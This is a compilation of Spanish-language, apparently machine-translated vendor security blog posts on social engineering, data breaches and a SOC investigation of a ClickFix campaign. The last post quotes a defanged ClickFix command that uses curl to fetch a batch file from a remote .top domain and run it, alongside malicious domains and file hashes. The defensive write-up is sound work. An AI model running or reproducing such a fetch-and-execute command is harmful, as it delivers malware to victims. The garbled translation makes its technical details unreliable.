¿Cuántas veces has escuchado la frase «No confíes en los extraños»? El punto clave hoy es que muchos extraños se disfrazan de alguien familiar, y esa confianza fuera de lugar es lo que nos lleva a ser engañados. Los cibercriminales usan ampliamente esta táctica, y tiene un nombre muy específico. ¿Alguna vez te has preguntado, «¿Qué es la ingeniería social en ciberseguridad?» Un ataque de ingeniería social aprovecha la psicología humana a través de la manipulación. Estas tácticas están diseñadas para engañar a las personas para que revelen información confidencial o realicen acciones que comprometan la seguridad, exponiendo así toda la infraestructura digital. Defender contra la ingeniería social es difícil debido a la imprevisibilidad humana y al hecho de que cualquiera puede ser víctima del engaño. Si bien es imposible predecir quién será el objetivo, esto no significa que estemos indefensos. La conciencia y la atención pueden contribuir en gran medida a evitar ser sorprendidos. ¿Qué es la ingeniería social y cómo funciona? La ingeniería social difiere de otros tipos de ataques cibernéticos, ya que no depende de explotar las vulnerabilidades técnicas, sino más bien humanas. Manipula emociones como la confianza, la curiosidad, el miedo o la falta de conciencia para lograr su objetivo. Las estafas de ingeniería social pueden tomar muchos formularios, desde estafas telefónicas hasta correos electrónicos fraudulentos o mensajes de redes sociales. Sin embargo, los esquemas de ingeniería social más sofisticados comienzan mucho antes de que el atacante contacte directamente a la víctima. Comienza con el reconocimiento, donde el atacante reúne información que se puede utilizar más tarde para manipular a la víctima utilizando técnicas persuasivas como la construcción de empatía o establecer falsa autoridad. El objetivo es crear una conexión emocional. Una vez que se gana la confianza, hay una posibilidad mucho más alta de que la víctima tome la acción prevista. Entrenamiento versus simulación: por qué la enseñanza no es suficiente, hay muchos tipos de ataques de ingeniería social, pero la parte más preocupante es que se crean nuevas trampas todos los días. Comprenderlos es esencial para reducir el riesgo cibernético, pero la conciencia por sí sola no es suficiente. Ahí es donde entran las simulaciones. Las herramientas de simulación de ingeniería social permiten a las organizaciones evaluar su riesgo real de experimentar un incidente de seguridad. Esta evaluación es crucial para establecer objetivos realistas y reducir el nivel actual de exposición. El riesgo siempre existirá, pero las simulaciones ayudan a reducirlo a un nivel que la organización considera aceptable. Simulaciones de phishing: una medida de seguridad efectiva Las simulaciones de phishing implican probar los hábitos de seguridad de los empleados mediante el envío de correos electrónicos falsos que imitan los mensajes maliciosos reales. Las empresas de ciberseguridad realizan estas pruebas en entornos controlados. Esto permite cuantificar el riesgo basado en los datos reales de la organización, evaluar la postura de seguridad de la empresa e identificar posibles vulnerabilidades entre los empleados. Este tipo de entrenamiento, que coloca a las posibles víctimas en escenarios de ataque simulados, ha reducido significativamente la vulnerabilidad a las amenazas de ciberseguridad. Para maximizar la protección, muchas empresas complementan estos programas con servicios especializados. En LevelBlue, nuestro servicio de gestión de exposición y vulnerabilidad incluye pruebas de penetración, así como ejercicios de equipo rojo y púrpura para probar las defensas a través de simulaciones de ataque y validación. Estrabas de ingeniería social: cómo protegerse prevenir los ataques de ingeniería social comienza con conciencia y conocimiento. Cuanto más familiarizado esté con las tácticas de manipulación, mejor preparado estará para detectarlas y evitarlas. A continuación se presentan algunas medidas clave que pueden ayudar: establecer políticas claras de seguridad de la información: definir cómo se deben manejar los datos confidenciales y cómo identificar e informar posibles amenazas de ingeniería social. Habilitar la autenticación multifactor (MFA): MFA agrega una capa adicional de verificación, lo que dificulta que los atacantes usen las credenciales robadas. Mantenga los sistemas actualizados: actualice regularmente los sistemas operativos, el software y las herramientas de ciberseguridad para permanecer protegidas de las vulnerabilidades conocidas. Implementar políticas de fideicomiso cero: restringir el acceso a datos confidenciales solo a aquellos que los necesitan. Incluso si una víctima está comprometida, los atacantes no podrán acceder a todo. Dispositivos bloqueados y seguros: especialmente en espacios públicos o entornos compartidos. Use contraseñas fuertes y únicas: cada cuenta debe tener una contraseña única con una combinación de caracteres. Si uno está comprometido, no pondrá en peligro al resto. Configure los filtros de correo electrónico: use filtros de spam para bloquear mensajes sospechosos antes de llegar a la bandeja de entrada. Ingeniería social inversa: cuando el atacante te hace comunicar, estamos acostumbrados a pensar en los cibercriminales como los que inician el contacto y la construcción de la confianza. Pero, ¿qué sucede cuando te hacen venir a ellos? Bienvenido a la ingeniería social inversa. ¿Qué es la ingeniería social inversa? Si ya conoce el significado básico de la ingeniería social, la ingeniería social inversa es una táctica en la que el atacante no se acerca directamente, en su lugar, la víctima los aborda de buena gana y ofrece la información que necesitan. Un ejemplo del mundo real: el atacante crea un problema o confusión (como encerrar a alguien de una cuenta) y luego se presenta como la solución (haciéndolo suplantándolo o soporte técnico). De esta manera, la víctima cree que está recibiendo ayuda y comparte voluntariamente datos confidenciales como información personal, financiera o de inicio de sesión. Construir una cultura de ciberseguridad Una cultura de ciberseguridad se trata de integrar la seguridad en la identidad y las operaciones diarias de la organización. Implica medidas prácticas concretas que se aplican a todos, en todos los niveles del negocio. En LevelBlue, ayudamos a las empresas a enfrentar los desafíos de seguridad cibernética de la era digital, abordando no solo los problemas técnicos sino también centrándose en el factor humano a través de la capacitación de Ciberseguridad IQ. Este servicio ayuda a los empleados a comprender cómo sus acciones impactan la seguridad dentro de la organización y establece una manera para que las empresas midan y mejoren la conciencia de seguridad individual. En un entorno cada vez más complejo, la defensa contra la ingeniería social no depende solo de la tecnología, requiere una estrategia integral basada en el conocimiento, la prevención y una cultura compartida de seguridad. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.
Etiqueta: resiliencia cibernética
¡LevelBlue se enorgullece en presentar la segunda edición de nuestro informe de tendencias de amenaza bianual! Este informe se basa en lo que comenzamos en nuestra primera edición, proporcionando a los equipos de ciberseguridad ideas críticas sobre las amenazas actuales. Nuestra segunda edición profundiza en la actividad del actor de amenazas observada en la primera mitad de 2025 por la detección y respuesta administrada de niveles (MDR) y los equipos de inteligencia de amenazas de LevelBlue Labs. Con este informe, nuestro equipo ofrece un análisis en profundidad en las tácticas utilizadas y explotadas por los atacantes y proporciona recomendaciones sobre cómo proteger su entorno. Nuestra investigación indica que la ingeniería social sigue siendo el vector principal para el acceso y el compromiso iniciales, ya que los actores de amenaza entienden que la forma más simple en su entorno es a menudo la puerta de entrada por la que fueron invitados por el usuario final. Junto con los avances en la IA, los atacantes están dominando rápidamente el arte del engaño para obtener un punto de apoyo inicial y evadir la detección. Los destacados del informe incluyen: la ingeniería social está en aumento, como se observa en ClickFix y otros ataques falsos de Captcha. Nuestro informe asesora cómo educar a sus empleados y endurecer su entorno contra estas campañas. Los tiempos de ruptura están disminuyendo, y los actores de amenaza ahora se mueven lateralmente en menos de 60 minutos, y en algunos casos menos de 15 minutos. Nuestros analistas descubren sus tácticas y brindan orientación para prevenir el movimiento lateral. Los sistemas de monitoreo y gestión remota (RMM) son clave para comprender qué esperar dentro de su entorno antes de que ocurra un incidente. Proporcionamos una revisión de los sistemas RMM observados en incidentes, incluidos los actores de amenazas comúnmente implementadas y/o explotadas por las herramientas. Nuestro equipo en LevelBlue trabaja diligentemente para monitorear y estudiar las tendencias actuales para ayudar a asegurar a nuestros clientes y socios contra las amenazas emergentes. Este informe proporciona otra forma para que nuestro equipo comparta información sobre las últimas amenazas con nuestros socios actuales y futuros en la comunidad de seguridad cibernética. Descargue el informe aquí para obtener más información sobre las tendencias más importantes en 2025, que enfatiza la importancia de la conciencia y la educación de la seguridad de los usuarios organizacionales para combatir el aumento de las tácticas de ingeniería social. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.
Seamos honestos: pocas frases pueden hacer que su estómago caiga más rápido que «sus datos se han visto comprometidos». Ya sea que sea un individuo que intente proteger sus contraseñas o una empresa que administra millones de cuentas de clientes, el miedo a una violación de datos es real y creciente. Vivimos en un momento en que casi todo está en línea: nuestras finanzas, nuestros registros de salud, nuestras identidades. Y si bien esa conectividad facilita la vida de muchas maneras, también deja la puerta abierta para que los ciberdelincuentes se cuelen. Es posible que se haya preguntado, ¿qué es una violación de datos? ¿O cómo sucede? Y más urgentemente: ¿cómo puedo evitar que me pase? Vamos a desempacarlo, sin jerga, sin drama. Solo los hechos, los riesgos reales y lo que puede hacer para mantenerse a salvo. Entonces, ¿qué es una violación de datos? En esencia, una violación de datos ocurre cuando alguien que no debería tener acceso a información confidencial tiene sus manos. Piense en ello como alguien que recoge la cerradura en su puerta de entrada digital y se aleja con sus secretos personales o comerciales. Esto podría ser cualquier cosa, desde un hacker que roba números de tarjetas de crédito, hasta un empleado que envía accidentalmente el archivo incorrecto, hasta un servidor en la nube mal configurado que filtra datos sin que nadie se dé cuenta. Ya sea deliberado o no, el resultado es el mismo: la información privada se expone. El término «violación masiva de datos» generalmente se refiere a los casos de titulares en los que se ven afectados millones de registros, o incluso miles de millones,. Estos eventos no son solo caros; Son profundamente personales. La gente pierde confianza. Las empresas pierden clientes. Y la recuperación puede llevar años. Algunos ejemplos de la vida real (sin la caída de los nombres) probablemente haya leído sobre grandes infracciones donde los nombres de usuario y las contraseñas terminan a la venta en la web oscura. Estos casos a menudo involucran a los atacantes que explotan pequeñas debilidades, como software obsoleto o credenciales reutilizadas, para acceder a una mina de oro de información. ¿Alguna vez recibió una notificación de Apple diciendo que su contraseña «apareció en una filtración de datos»? Eso significa que sus credenciales fueron encontradas flotando en una base de datos comprometida. Tal vez usaste esa misma contraseña en otros cinco sitios. Ahora los cinco son vulnerables. Y así, un solo enlace débil puede abrir las compuertas. ¿Por qué siguen sucediendo estas violaciones? No lo endulzamos. A menudo somos el enlace más débil. La forma más común en que ocurren las violaciones no es un ataque de alta tecnología al estilo de James Bond. Es phishing. Un correo electrónico aparentemente inocente engaña a alguien para que haga clic en un enlace malo o entregue su información de inicio de sesión. Otras causas? Contraseñas que son demasiado cortas, demasiado simples o utilizadas en todas partes. Software que no se ha actualizado en meses (o años). Las computadoras portátiles fuera de lugar, teléfonos perdidos o Wi-Fi no garantizado. Empleados que simplemente no sabían mejor. La realidad es que la mayoría de las violaciones de datos son evitables, pero solo si estamos prestando atención y tomando medidas antes de que sea demasiado tarde. Cómo mantener a los malos buenas noticias: no eres impotente. Si bien no hay bala de plata, algunos hábitos inteligentes pueden ser muy útiles para mantener sus datos seguros. Doble la seguridad con la autenticación MFA multifactor es como poner un segundo cerrojo en su puerta. Incluso si alguien obtiene su contraseña, aún necesitará otra pieza del rompecabezas, como un código en su teléfono o su huella digital. Deja de usar en serio «123456». Use contraseñas fuertes y únicas. Mejor aún, deje que un administrador de contraseñas lo maneje por usted. Están construidos para este problema exacto. Mantenga sus sistemas actualizados, sí, esos molestos recordatorios de actualización son importantes. A los hackers les encanta el software antiguo porque está lleno de agujeros. Parchearlos cierra la puerta antes de que alguien la atraviese. Esté atento a su red, las amenazas cibernéticas pueden esconderse a la vista. Es por eso que servicios como la detección y respuesta administrada de LevelBlue (MDR) son un cambio de juego. Monitorean su entorno las 24 horas, los 7 días de la semana, listos para actuar en el momento en que algo mira. Enseñe a su equipo los correos electrónicos de phishing son inteligentes. Capacitar a su personal para detectarlo puede marcar la diferencia. Y generalmente es mucho más barato que lidiar con una violación. Cifre lo que importa si alguien roba sus datos, el cifrado lo hace ilegible. Piense en ello como convertir su información en un rompecabezas sin la caja. Tenga un plan antes de que necesite uno si lo peor sucede, no desea estar luchando. Construya un plan de respuesta a incidentes ahora. Probarlo. Actualizarlo. Poseerlo. ¿Quieres más detalles? Hemos reunido un excelente desglose de las estrategias de recuperación de incumplimiento que vale la pena visitar. ¿Qué pasa si sucede de todos modos? Si te encuentras en medio de una violación, esto es lo que debes hacer: si eres un negocio: bloquea las cosas rápidamente. Haga que sus equipos legales y de seguridad involucren de inmediato notifiquen a los usuarios y reguladores según sea necesario. Investigue lo que salió mal y solucionó el problema raíz. Trabaje con expertos en forense digital para comprender el ataque y evitar una repetición. Si es un individuo: cambie sus contraseñas (sí, allo). Encienda MFA donde pueda. Observe sus extractos bancarios e informes de crédito como un halcón. Esté en alerta por los intentos de phishing o la actividad sospechosa. Las violaciones de datos de la pieza de cumplimiento no son solo desordenadas. También pueden llevarlo en agua caliente legal. Si está manejando los datos de los clientes, las regulaciones de privacidad como el GDPR requieren que lo mantenga seguro y le diga a la gente cuándo sale algo mal. El incumplimiento puede costarle, literalmente. Los costos acumulativos pueden alcanzar un millón de dólares como se hace referencia en nuestro blog reciente. Entonces, volviendo a esa gran pregunta: ¿Qué es una violación de datos? Es más que un titular o un problema tecnológico. Es un problema humano, basado en la confianza y roto por negligencia, ignorancia o malas intenciones. Pero hay un lado positivo: la mayoría de las violaciones no son inevitables. Con la mentalidad y las herramientas correctas, se pueden prevenir. La ciberseguridad no tiene que dar miedo. Solo tiene que ser una prioridad. Ya sea que sea un emprendedor solista o una empresa global, tiene el poder de tomar decisiones más inteligentes y asociarse con expertos que saben cómo ayudar. LevelBlue está aquí para ti. Desde el monitoreo de amenazas 24/7 y un enfoque proactivo para el cumplimiento, hasta la respuesta a incidentes y los forenses digitales, lo ayudamos a proteger lo que más importa. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.
Un cinturón de herramientas SOC para mantener el ritmo de las amenazas en rápida evolución y los tiempos decrecientes de los atacantes, el equipo de operaciones de seguridad LevelBlue aprovecha múltiples herramientas y asociaciones clave para acortar el tiempo entre la detección y la respuesta. A continuación se presentan algunos ejemplos de las herramientas utilizadas por nuestro SOC y algunas de las circunstancias en las que se utilizaría cada herramienta. Una asociación con Sentinelone a través de la seguridad de punto final administrada de LevelBlue con Sentinelone, nuestro SOC ha proporcionado un valor excepcional con una mayor protección y visibilidad de punto final a nuestros clientes. El SOC pudo reducir en gran medida el tiempo entre la detección y la respuesta con las alarmas STAR (respuesta activa de la historia) dentro de Sentinelone. Estas alarmas estelares son construidas a medida por nuestro equipo y están informadas por detecciones proactivas de nuestros cazadores de amenazas en torno a amenazas recientes y TTP (técnicas, tácticas y procedimientos). Al utilizar informes de inteligencia de amenazas y datos en cuestión, nuestro equipo pudo realizar una revisión más profunda sobre los TTP de amenazas recientes. Esto permitió la creación de reglas personalizadas para detectar más rápidamente los COI (indicadores de compromiso) dentro de los entornos de nuestros clientes. Nuestro equipo de inteligencia de amenazas de LevelBlue Labs también utilizó esta información para crear nuevas reglas en USM en cualquier lugar, nuestra plataforma Open XDR. Como socio de seguridad de confianza, LevelBlue siempre se esfuerza por mejorar nuestros tiempos de detección y respuesta para aumentar el valor y proporcionar un apoyo más proactivo a nuestros clientes. Estas herramientas son vitales para que podamos mejorar los tiempos de respuesta y evitar que las amenazas afecten a nuestros clientes. Bundling Seguridad de punto final administrado y detección y respuesta de amenazas administradas es una excelente opción para los clientes que carecen de ingestión de datos desde los puntos finales en USMA y desean una mejor visibilidad. El paquete también beneficia a los clientes que buscan equilibrar el costo de los socios de seguridad de terceros con los costos de las herramientas de monitoreo adicionales. En lugar de comprar múltiples herramientas para llevar datos potencialmente ruidosos a la USMA, Bundling proporciona una visibilidad integral en sus puntos finales junto con el monitoreo 24/7 que es parte de nuestra oferta administrada de detección de amenazas y respuesta. Intercambio de amenazas abiertas (OTX) El Lablue Labs Open Amenic Exchange (OTX) es otra herramienta integral de la que dependen nuestros analistas durante el triaje e investigación de alarma. Esta plataforma es una de las comunidades de inteligencia de amenazas más grandes con más de 330k+ miembros en todo el mundo. LevelBlue Labs actualiza continuamente OTX, y la inteligencia de amenazas de OTX se integra perfectamente en la plataforma USMA de LevelBlue. Los entornos de nuestros clientes están escaneados para los partidos de pulso OTX y los COI. Si se descubre un indicador de un pulso al cliente en su entorno, se genera una alarma. Al examinar una alarma en USMA, los analistas están dirigidos al pulso asociado. El analista puede usar los COI adicionales asociados con ese pulso para promover su investigación. La centralización de esta información en USMA ayuda a nuestros analistas a racionalizar el triaaje de incidentes y estos pulsos se pueden comparar con otra inteligencia de código abierto (OSINT) para dar a los analistas más contexto en su investigación. Los analistas también pueden usar la ID de pulso OTX directamente dentro de USMA para consultar el entorno de los clientes para cualquier COI adicional asociado con la amenaza que se está investigando. Figura 1: Búsqueda de eventos de instancia del cliente utilizando reglas de estrella de ID de OTX El SoC LevelBlue también ha creado un sistema de alerta personalizado basado en métodos de detección de alta fidelidad que ha aumentado los tiempos de respuesta al brindar estas alertas a la vanguardia de la atención de nuestros analistas. Estos métodos de alta fidelidad, ya sea relacionados con las reglas de estrella personalizadas o las detecciones de compromiso del usuario, son solo otro ejemplo del trabajo proactivo que hace nuestro equipo SOC para mejorar el valor para nuestros clientes. Las Reglas de Star de Sentinelone han demostrado ser una adición invaluable al conjunto de herramientas de detección ya utilizados por el Soc MDR. Cuando se detecta una amenaza y se ha planteado una alarma, un analista de SOC utilizará diferentes herramientas para analizar la amenaza y sus artefactos relacionados. El SOC LevelBlue investiga: ClickFix ClickFix es una campaña de ingeniería social que explota la apariencia de legitimidad para engañar a las víctimas para ejecutar guiones maliciosos. En la siguiente investigación, el SOC utilizó varias herramientas, incluidas las sandbox de Joe, la visibilidad profunda de Sentinelone y la lista de bloques Sentinelone para analizar un ataque de clickFix. La investigación comenzó cuando el SOC recibió una alarma para una línea de comando que es indicativa de malware ClickFix (ver Figura 2). Figura 2: Alarma ClickFix En USMA La línea de comando que se muestra arriba permitió a nuestro equipo obtener el archivo y la información de ese archivo. Con esto, nuestro equipo podría buscar en nuestra base de clientes para determinar si el archivo existía en cualquier otro entorno y agregar los hashs de archivo a nuestra lista de bloques Global Sentinelone. Para revisar esta línea de comando, el SOC generalmente utilizaría un servicio de sandbox en línea como Sandbox de Joe o Anyrun. Joe’s Sandbox es preferible en caso de que haya datos de clientes presentes, porque se ejecuta en un inquilino privado. AnyRun también es una herramienta poderosa, pero su servicio gratuito no es privado y se usa solo si se confirma que no se contienen datos del cliente. Después de ejecutar la línea de comando anterior en Joe’s Sandbox, recibimos un informe de actividad en profundidad (ver Figura 3 a continuación). Figura 3: Línea de comando inicial ejecutada en el ataque de ClickFix después de ejecutar el comando en Joe’s Sandbox, nada apareció en el frente, pero obtuvimos una lista de archivos sospechosos en el informe que se generó (ver Figura 4 a continuación). Figura 4: Lista de archivos sospechosos del informe Sandbox de Joe del archivo. Pudimos recuperar los hashes SHA1 y buscar un compromiso potencial en los entornos de nuestros clientes agrupados. Usando la visibilidad profunda de Sentinelone, nuestro equipo de SOC escribió una consulta simple buscando en los campos de hash de archivo para cualquiera de los hashes obtenidos en nuestro informe: #Hash contiene («A48C95DF3D802FFB6E5ECADA542CC5E028192F2B», «7EC84BE84FE23F0B0093B647538737E1F19EBB03», «C2E5ea8AFCD46694448D812D1FFCD02D1F594022», «3D1999BEE412CBAC0A6D2C4C9FD5509AT12227INE. «98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07», «01873977C871D3346D795CF7E38888685DE9F0B16»,, «C4E27A43075CE993FF6BB033360AF386B2FC58FF», «906F7E94F841D464D4DA144F7C858FA2160E36DB», «, «A556209655DCB5E939FD404F57D199F2BB6DA9B3», «AD464EB7CF5C19C8A443AB5B590440B32DBC618F») Ejecutando esta consulta mostró US 5 detecciones de un incidente que ocurrió una semana antes en un entorno de diferentes clientes (vea la figura de diferentes clientes (vea la figura 5 a continuación. Figura 5: Detecciones de consultas que buscan hash obtenidos en el informe Nuestro equipo también utilizó la función de lista de bloques de Sentinelone para agregar estos hashes a Blocklist a nivel de alcance global para garantizar que el archivo se mate y se ponga en cuarentena si se detecta en un entorno de cliente (ver Figura 6). Figura 6: Agregar el hash SHA1 de NetSupport Rat a Sentinelone Global Blocklist Al realizar un análisis estático de un sitio web o un enlace de phishing potencial, nuestros analistas normalmente utilizarán un servicio que visita el sitio y proporciona una captura de pantalla de la página, junto con información que incluye el código fuente de la página, redireccionamientos, scripts y cualquier imagen. En el siguiente escenario, nuestro equipo recibió una alarma para una solicitud de DNS a un dominio sospechoso que se incluye en nuestros pulsos OTX (Figura 7). Figura 7: Alarma OTX En USMA para el sitio web comprometido responsable del ataque de ClickFix al revisión inicial, el dominio parecía pertenecer a un sitio web de viajes normal. Luego, nuestro equipo inspeccionó el tráfico de red desde el escaneo del sitio web en la pestaña HTTP a continuación y buscó cualquier redirección que ocurriera durante el escaneo en la pestaña Redireccionamientos (ver Figura 8). Figura 8: escaneo de URL del sitio comprometido Islonline[.]org en la pestaña HTTP, nuestro equipo vio que un archivo titulado J.JS alojado en el sitio navegado al sitio Hxxps[://]lang3666[.]TOP/LV/XFA[.]. Figura 9: Redirigir al archivo JS sospechoso y el dominio .TOP al ejecutar un escaneo de URL, nuestros analistas pudieron recuperar el código fuente del archivo JS: Figura 10: Código fuente del archivo JS alojado en el dominio .TOP Revisión adicional del archivo reveló un script ofuscanado que se usa para determinar si el agente de usuarios es un teléfono móvil o escritorio. El script luego genera un identificador de 8 dígitos que luego se adjunta a la URL HXXPS[://]lang3666[.]superior/lv/índice[.]PHP?. Esto da como resultado descargar otro script para obtener la carga útil final. Los ataques de clickFix a menudo siguen esta cadena de eventos y dan como resultado un comando similar al que se muestra a continuación: cmd.exe/c curl.exe -k -ss -x post https: // pravaix[.]superior/lv/lll[.]php -o «c: \ users \ public \ jkdfgf.bat» && start /min “” c: \ users \ public \ jkdfgf.bat Conclusión Como se ve en la investigación de ClickFix anterior, las integraciones de USM Anywhere permiten que el SoC LevelBlue reduzca en gran medida el tiempo entre la detección y la respuesta. Puede leer más sobre ClickFix y las recomendaciones de LevelBlue SoC para proteger sus entornos en el informe de las tendencias de amenaza de LevelBlue, Foot Me Once: cómo los cibercriminales están dominando el arte del engaño. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.